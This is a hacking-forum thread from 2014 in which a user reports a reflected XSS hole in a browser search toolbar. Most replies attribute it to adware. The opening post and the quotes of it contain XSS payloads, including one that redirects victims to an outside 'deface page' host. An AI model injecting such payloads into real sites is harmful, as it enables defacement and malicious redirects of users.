Sinisterly
FireFox XSS vuln - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking)
+--- Thread: FireFox XSS vuln (/Thread-FireFox-XSS-vuln)



FireFox XSS vuln - BlueCat - 05-25-2014

You can see it here, The little toolbar at the top.

http://prntscr.com/3mkjfm

I used this as the code
Code:
"><script>alert("BLUECAT")</script>

Then went a little bit further and added my deface page to it. by using this code

Code:
"><script>window.location="http://www.thedarkcommunity.6te.net/index.php/";</script>

Picture: http://prntscr.com/3mkk8e


RE: FireFox XSS vuln - Boomslang - 05-26-2014

(05-25-2014, 10:58 PM)BlueCat Wrote: You can see it here, The little toolbar at the top.

http://prntscr.com/3mkjfm

I used this as the code
Code:
"><script>alert("BLUECAT")</script>

Then went a little bit further and added my deface page to it. by using this code

Code:
"><script>window.location="http://www.thedarkcommunity.6te.net/index.php/";</script>

Picture: http://prntscr.com/3mkk8e

I believe the cause of vulnerability is the add-on you're using (that search bar or whatever is that) and not the Firefox itself.
Anyway, you probably should report this to developper team of that add-on.


RE: FireFox XSS vuln - RaccoonCity_mybb_import13707 - 06-01-2014

The problem is not Firefox, this is a non-persistant XSS on whatever search engine that is.

As @RootTheSystem said, you should report that to the developer team of the search engine (which I believe it is).


RE: FireFox XSS vuln - BlueCat - 06-16-2014

(05-26-2014, 10:55 AM)RootTheSystem Wrote:
(05-25-2014, 10:58 PM)BlueCat Wrote: You can see it here, The little toolbar at the top.

http://prntscr.com/3mkjfm

I used this as the code
Code:
"><script>alert("BLUECAT")</script>

Then went a little bit further and added my deface page to it. by using this code

Code:
"><script>window.location="http://www.thedarkcommunity.6te.net/index.php/";</script>

Picture: http://prntscr.com/3mkk8e

I believe the cause of vulnerability is the add-on you're using (that search bar or whatever is that) and not the Firefox itself.
Anyway, you probably should report this to developper team of that add-on.

I will report it. But I did not install an add on, The search engine comes with firefox when installed


RE: FireFox XSS vuln - Hatemind - 06-16-2014

You have some adware, from the looks of it. 6te.net is a part of free web hosting area, which has no ads for low traffic sites. You have a banner ad on your deface. Also, I'm pretty sure that's not the default search engine for firefox when installed, I believe it's google. You should check your PC for malware and remove any nasty browser extensions you may have.


RE: FireFox XSS vuln - BlueCat - 06-16-2014

(06-16-2014, 01:24 PM)Hatemind Wrote: You have some adware, from the looks of it. 6te.net is a part of free web hosting area, which has no ads for low traffic sites. You have a banner ad on your deface. Also, I'm pretty sure that's not the default search engine for firefox when installed, I believe it's google. You should check your PC for malware and remove any nasty browser extensions you may have.

My computer is fine, No malware. It's not google. Trust me. I check my Web browser extensions very often and they're fine.


RE: FireFox XSS vuln - dongly007 - 09-16-2014

This is pretty old VUL .. Wont work much now indeed the firefox is not updated to the latest version


RE: FireFox XSS vuln - Anima Templi - 09-17-2014

I would be HIGHLY surprised if you'd find any FF install with that search engine as default/comes pre-installed.


RE: FireFox XSS vuln - Anima Templi - 09-17-2014

I would be HIGHLY surprised if you'd find any FF install with that search engine as default/comes pre-installed.